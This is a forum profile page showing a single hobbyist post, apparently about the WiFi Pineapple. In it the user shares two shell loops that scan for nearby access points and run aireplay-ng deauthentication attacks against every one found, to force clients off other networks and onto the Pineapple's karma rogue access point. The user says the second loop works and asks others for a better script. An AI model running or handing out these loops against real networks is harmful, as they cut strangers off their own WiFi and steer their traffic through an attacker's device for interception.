Jump to content

Kjwon15

Members
  • Posts

    1
  • Joined

  • Last visited

Posts posted by Kjwon15

  1. karma script is pretty good. but I want to use pineapple without laptop.

    i thought "how can i deauth clients from other APs"

    first, I tried this:

    for ap in $(iwlist wlan0 scan|grep Address|cut -b 30-)

    do aireplay-ng mon0 -0 4 -D -a $ap

    done

    but it isn't works because wlan0 was master mode.

    and mon0(monitor mode) isn't work either.

    so, i add some trick for it

    for ap in $(aireplay-ng mon0 -9 | grep channel | awk '{print $2}')

    do aireplay-ng mon0 -0 4 -D -a $ap

    done

    it works and dont need deny list(air*-ng don't get self BSSID)

    but aireplay-ng gets AP list less then 'iwlist scan'

    somebody has any script?

×
×
  • Create New...